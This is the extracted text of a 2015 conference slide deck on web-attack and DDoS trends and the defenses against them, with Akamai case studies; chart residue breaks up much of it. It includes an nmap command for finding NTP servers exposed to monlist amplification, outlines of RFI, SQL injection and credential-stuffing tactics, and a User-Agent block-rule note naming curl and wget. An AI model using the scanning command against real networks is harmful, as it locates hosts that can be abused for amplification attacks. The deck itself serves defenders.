NTXISSACSC3 - Cyber Warfare: Identifying Attackers Hiding Amongst the Flock by Anthony Lauro

@NTXISSA #NTXISSACSC3

Cyber Warfare: Identifying Attackers Hiding Amongst the Flock

Anthony Lauro

Sr. Enterprise Security Architect

Akamai Technologies, Inc

October 3rd, 2015


Who am I? (unphilosophically speaking)

About me:

• Anthony Lauro | CISSP, GWAPT

• Sr. Enterprise Security Architect Akamai

Technologies, Inc

• 16 years Information Security Experience

• Advise Akamai clients on Cybersecurity Resilience

• Lead Application Security training for Enterprise

Security Architecture team @Akamai

• Attended CCCC a long, long time ago…


There are no rules of

architecture for castles in the

clouds.

-Gilbert K. Chesterton


There are no rules of

architecture for castles in the

clouds.

-Gilbert K. Chesterton


THREAT LANDSCAPE


Evolving Attack Campaigns

190 Gbps attack against

US financial institution

Q1 13 Q2 13

Account Checker

(eCommerce)

Largest DNS

reflection attack,

167 Gbps

(Financial Services) Operation Ababil

Q1 14Q3 13 Q4 13

DDoS

(Retail)

209 Gbps

EMEA media company

Record number of

DDoS attacks in Q3

13

17%


Top 10 Target Countries for Web Application Attacks

Q1 2015


Top 10 Source Countries for Web Application Attacks

Q1 2015


Attacks Grow Because Methods Improve

• Traditional DDoS attacks used compromised home computers

• ‘Cloud’ based DDoS attacks harness the scale of global botnets

• Amplification attacks target protocol vulns to amplify size

• SNMP (6.3x)

• DNS (28x-54x)

• CharGEN (358.8x)

• NTP (556.9x)

Gbps

Mpps

2014e

2013

201220112010

20092008

200720062005

112

188

2211

39

15

48

29

68

38

79

45

82

69

144

320

270

160


You Don’t Have to Be Elite Anymore:

“You can do it, we can help”!


Infrastructure Attacks: Smoke Screen?

27%

24%

8%

4%

30%

5%


WHAT MOTIVATES THE THREAT ACTOR?

Hacked

Web Server


Are You Prepared?


There Are No Immunities Between Verticals

Source: www.informationisbeautiful.net/


2014 Attack Trends

• Top three attack vectors are

application layer attacks

• Defacement leads as the top

attack, followed by

SQLi and Account Hijacking

as the most prevalent attacks

seen in 2014

Source: Stateoftheinternet.com


Login Abuse: Account Checker Attacks

The fuel for any account checker is a list of credentials.

Fortunately for attackers, there are a huge number of credentials

that are public.

• 38,000,000 Adobe accounts

• 318,000 Facebook accounts

• 70,000 Google accounts

• 60,000 Yahoo accounts

• 22,000 Twitter accounts

• 8,000 ADP accounts

• 8,000 LinkedIn accounts


DEFENSEIVE

Techniques


A Castle

Built in 1385 Defense against French: 100yr War


• Acts as a gateway

• Defensive resources

become limited

• Entry and Exits cannot

coexist


WEB SECURITYCommon Approaches


Common Approaches to Web Security

Build It Buy BoxesDeny the problem


DO NOTHING


Approaches for Web Security

On-Premise Hardware

Router

Firewall

Load

balancer

Bandwidth

Application Protection

Cloud Service

Cloud

Platform

ISPs

Internet Service Providers


On-Premises Web Security Approach

On-Premise Hardware

Router

Firewall

Load

balancer

Bandwidth Bandwidth Constraint

Connection & Processing Limitations

Application Vulnerability Exploitation

“Have to ingest ALL traffic before a

Yes/No decision can be made”

Performance Degradation

Throughput of devices cannot meet

volume / requests per second of good

and bad traffic spikes.

Reliability

WAF configurations are complex

often not tuned properly or not in

blocking mode.

Accuracy


I put the WAF on a SPAN port.

I was afraid of blocking

legitimate traffic!

How did this breach

occur, we have a WAF!!


Internet Service Provider Approach

ISPs

Internet Service Providers

DDoS Only Protection

False Positives/ Upstream Blacklisting

Single-Homed Protection

Carrier Dependent Architecture

Capacity Issues At Scale


Those are birds…Right?

I forgot my shield!


Application Protection

Cloud Service Approach

Application Protection Cloud Service

Cloud

Platform

Direct-to-Origin DDoS Protection Gap

Shared Infrastructure (Capacity Constraints)

Acceptable Use Monitoring Challenge

Retaining Real-time Visibility

Not Always Enterprise Class Protection


“In other words, careful where you aim that gun,

#OpISIS, because it might point back at you as

well.” -Mike Masnick TechDirt

https://www.techdirt.com/user/mmasnick


MULTI PERIMETERDEFENSE


MULTI PERIMETER DEFENSE


MULTI PERIMETER DEFENSE


For Internet-facing Applications

Internet

WebRetrieval and integrity

of content and data

OriginSupporting infrastructure and

other applications

DNSFinding the application

Datacenter User


Multiple PerimetersFor Internet-facing Applications

Volumetric Protection

• Massive resiliency

• Thousands of points of presence

• Distributed geographically

• Rate controls for noisy requestors

Attacks Against CNAMEs

• Network and application layer filtering capable

• Protocol validation/Filtering

• SSL decrypt – re-encrypt

• Geo Sensing and Filtering Capable

• Capacity: Throughput & P/ps

Attacks Against Datacenter IP’s

• Direct to origin protection using BGP redirection

• Multiple globally distributed scrubbing centers

• Attack capacity to withstand multiple attacks at once

• Good traffic bypass as not to degrade performance


Multiple PerimetersFor Internet-facing Applications

Application Layer Attacks

SSL decryption at scale

Risk scoring rule sets

Tune accuracy over time

Attacks Against DNS

Rate Controls - Connection Throttling

White Listing

Application Inspection

DNSSEC

Client/Server Locks

Anycast Responses

Event Visibility

Threat intel gathered and validated against global dataset

Real-Time event correlation between security policies

Ability to identify hosts based on previous malicious behavior

Import log feed from ‘cloud’ into internal SIEM for correlation


HOW TO YOU IDENTIFY & CLASSIFY


THERE’S A DIFFERENCE BETWEENVISIBILITY & INSIGHT


• Use behavioral data to protect your

castle

•Collect and correlate attack traffic into a

large dataset from across the web

• Identify bad clients based on past behavior

•Define a risk score for malicious clients

•Filter malicious client based on risk score

CLIENT REPUTATION SCORING


Information Intelligence

Raw, unfiltered feed Processes, sorted information

Aggregated from virtually every

source

Aggregated from reliable sources and

cross correlated for accuracy

May be true, false, misleading,

incomplete, relevant or irrelevant

Accurate, timely, complete, assessed

for relevancy

Not actionable Actionable

InfoSec teams are swimming in data

More raw “information” is not the solution


53

11,00816,135

21,35915,071

30,427

69,226

124,625

9/24 9/25 9/26 9/27 9/28 9/29 9/30 10/1Unique Shellshock payloads

Threats Change/Advance Over Time

Shellshock disclosed


CASE STUDIESAPPLICATION / DDoS ATTACKS


Case Study: 320 Gbps DDoS Attack:Gaming Vertical, APAC Region

• Largest attack ever mitigated by Akamai

against single customer

• Targeted primary website, supporting

network infrastructure, and DNS

• Multiple attack vectors:

• SYN/UDP floods - entire subnet

• Volumetric attack against DNS

• Attack characteristics:

• 320 Gbps and 71.5 Mpps peak traffic

• 2.1 million requests/s against DNS


138

232

321

155177

312

4

198217

308

35 33

70

3

21.5

One Attack in a Broader DDoS Attack Campaign

Start EndInfrastructure (Gbps) authDNS (Mpps) DNS Reflection (Mpps)Web (Gbps)

21 + Day campaign against single customer

• 39 distinct attacks targeting applications and DNS infrastructure

• Eight attacks >100 Gbps including record 320 Gbps attack


Grow revenue opportunities with fast, personalized

web experiences and manage complexity from peak

demand, mobile devices and data collection.

Opening

Ceremony

1st day of sports

• 132 BILLION requests

processed by our WAFs• 10x more than 2010 Winter

Olympics

• WAF rules triggered• 127x more than 2010 Winter

Olympics

• Custom Rules Triggered:

166,000,000

• Rate Controls (Adaptive Rules)

Triggered: 5,600,000

• Requests Denied: 182,200,000


Grow revenue opportunities with fast, personalized

web experiences and manage complexity from peak

demand, mobile devices and data collection.

0

100

200

300

400

500Attack traffic…

0

50000

100000

150000

200000

250000

300000Spain toNetherlands

0

100

200

300

400

500

600

-500

500

1500

2500

3500

4500 Chile to…Australia…

0

2000

4000

6000

8000

10000

12000

14000

16000Ivory Coastto Japan

3-1

1-51-2

3-1

Opening ceremony


Avoid data theft and downtime by extending the

security perimeter outside the data-center and

protect from increasing frequency, scale and

sophistication of web attacks.

Web Application Attacks by Industry – Q1 2015


• Reflection attack• Mostly SNMP v2c devices (~3+ years old) with default

“public” community string• Routers, printers, cable modems, NAS• New tool automates sending getBulkRequest to open

SNMP servers.• Flood of SNMP GetResponse data sent from reflectors to

victim on port 80• SNMP query begins at highest (OID) tree level to obtain

largest possible response

The Attack du jour?



Avoid data theft and downtime by extending the

security perimeter outside the data-center and

protect from increasing frequency, scale and

sophistication of web attacks.

Case Study: NTP Attacks on Origin

500XRETURN RATE

IN TRAFFIC

>100GBPSATTACK TRAFFICAGAINST ORIGIN

1,000+INCREASE IN HITS PER

SECOND AGAINST ORIGIN

Attack Vector

Request with spoofed source IP of target server sent to a vulnerable NTP server that allows the monlist function.

NTP server replies back to the target IP, direct to origin, at massive scale.


Use nmap NSE Script:

identify vulnerable hosts

Example: nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target>

• The monitor list in response to the monlist command is limited to 600

associations.

• The monitor capability may not be enabled on the target in which case you may

receive an error number 4 (No Data Available).

• There may be a restriction on who can perform Mode 7 commands (e.g. "restrict

noquery" in ntp.conf) in which case you may not receive a reply.

• This script does not handle authenticating and targets expecting auth info may

respond with error number 3 (Format Error).


SSDP aka uPnP (Universal Plug and Pray)SSDP 200-OK Response


DNS Attack Targeting Akamai Customer

• DNS requests peaked at 168k per second.

• 19B hits in 5 days. Normally serve ~30M hits per week.


DNS Hijacks Attacks: Common Tactic for Middle Eastern Attackers

• Client DNS Locks

• clientUpdateProhibited

• clientTransferProhibited

• clientDeleteProhibited

• Registrar locks

• serverUpdateProhibited

• serverTransferProhibited

• serverDeleteProhibited

US DoD’s DNS Hijacked

Best Practice DNS Locks


RFI Attempt to pull click.php file from

remote location

Using RFI vuln in TimThumb Plugin

Remote File Inclusion


Here’s what click.php is really about!

HTTP(s) Redirections can fluctuate between 14-20

different pay4click companies and advertiser’s and that

means precious bitcoin revenue for the attacker and his

friends.

http://www.secureworks.com/cyber-threat-intelligence/threats/ppc-hijack/


When good things go bad:

Rogue Reseller to Competitor

“After years of this relationship we recently found that they now have a copycat site and are selling

our products that they are now manufacturing on their own.” – Enterprise Manufacturing Customer

“At first they were just scraping our site and we saw it to be mutually beneficial…”


Blind SQL Injection: Time Based Attack

This type of blind SQL injection relies on the database pausing for a specified amount of time and examining

the results. Using this method, an attacker enumerates each letter of the desired piece of data.

Client Request


SQL Injection Analysis2000 customers over one week

SQLInjectionAttacks %

HTTP 8,137,681 96.6

HTTPS 287,808 3.4

Total 8,425,489 100

Protocol Breakdown

Breakdown by Intent

Source: Akamai CSI


CMD INJECTION


Remote File Inclusion

Attack Request Client Info


“Credentials” Cookie Value Exposure


ACCOUNT CHECKERS: CARDERS

Several techniques are used to avoid

detection and mitigation, including:

● Randomization of UserAgent header

● Targeting of alternative (mobile/API/legacy) login pages, which may have weaker mitigation controls and are often overlooked by the customer.

● Attacks originate from highly distributed set of IP addresses, with different source countries.

● Use of low request rates to evade rate controls.

● Change in order of headers.

● Changes in tactics when 403 responses are received.


Fraud – Vietnamese Carders

Carder TTP

• Build Tools Server

• Cultivate List of Open Proxies

• Acquire Compromised Logins

• Check/Alter Compromised Accounts

• Make Fraudulent Purchases

• Cash out/Resell gift cards


Login Abuse: THE STRUGGLE IS REAL

You know who you are!


Login Abuses: TTPs and Defenses

Rate controls to block fast moving scripts• Attack relies on being able to check thousands of accounts quickly

• Blocking aggressive scripts prevents login exploitation

Internal monitoring for changes to customer accounts• Email address

• Shipping address

• Same email on multiple accounts

Geo blocklists for areas where there is no business• Cuts down on the places attackers can launch from

• Do cloud server providers need to access your webpage?

Custom rules to block User-Agent strings (or lack thereof)• Attack scripts are often simple and will contain only “curl” or “wget”

• Sometimes none at all




DD4BC: (DDoS for Bitcoin)

• Industries affected• Payment Processing

• Banking & Credit Unions

• Gambling

• Oil & Gas

• E-Commerce

• High Tech Consulting/Services

• Attack Types• Boot Stressor sites most likely culprit

• Reflection Attacks


Looking Forward into 2015

• Industry Verticals• Gaming, Fiserv, Internet & Telecom, Software & Tech, and Media verticals expected

to be targeted heavily in 2015

• Security vulnerabilities continue to increase due to bespoke/custom applications

• Good history of successful attacks

• DDoS Attacks• Expect more ‘mega’ attacks > 100Gbps

• Commoditization of DDOS attacks

• IPv6 uptake to increase DDoS vector

• Never pay ransoms, but do have a plan

• APPLICATION ATTACK TRENDS

• APPSEC IS FAILING – NEED HELP!

• IF YOU DON’T HAVE AN APPSEC PROGRAM

START ONE!

• INJECTION & XSS RIDE OWASP TOP 10

• SESSIONS MGMT – YOURE DOING IT WRONG

• DEVELOPERS – YOU’RE BEHIND!


1. You Need ’Validated’ DataTo derive intelligence on current & evolving threats.

2. Scale, Availability & ResilienceTo be high performing, take the punches, & stay online.

3. A PlanTo understand how to respond to bad day scenarios.

4. Control & Flexibility To adapt your defenses dynamically.

Cyber Security Requirements: 5 Points To Take Away

5. People & ExperienceTo execute every time you come under attack.


RESOURCES

OWASP: OPEN WEB APPLICATION SECURITY PROJECT

https://www.owasp.org/index.php/Main_Page

BSIMM5: BUILDING SECURITY IN MATURITY MODEL v5

https://www.bsimm.com/

SANS SWAT: SECURING WEB APPLICATION TECHNOLOGIES v1.1

http://software-security.sans.org/resources/swat

CERT: SECURE CODING STANDARDS

http://www.cert.org/secure-coding/research/secure-coding-standards.cfm?

AKAMAI TECHNOLOGIES (HEY, WHY NOT)

https://www.akamai.com/us/en/cloud-security.jsp

https://www.owasp.org/index.php/Main_Page

https://www.bsimm.com/

http://software-security.sans.org/resources/swat

http://www.cert.org/secure-coding/research/secure-coding-standards.cfm

https://www.akamai.com/us/en/cloud-security.jsp


Tony Lauro | CISSP, GWAPT

Senior Enterprise Security Architect

@tonylauro

@NTXISSA #NTXISSACSC3@NTXISSA #NTXISSACSC3

The Collin College Engineering Department

Collin College Student Chapter of the North Texas ISSA

North Texas ISSA (Information Systems Security Association)

NTX ISSA Cyber Security Conference – October 2-3, 2015 73

Thank you

Technology

NTXISSACSC3 - Cyber Warfare: Identifying Attackers Hiding Amongst the Flock by Anthony Lauro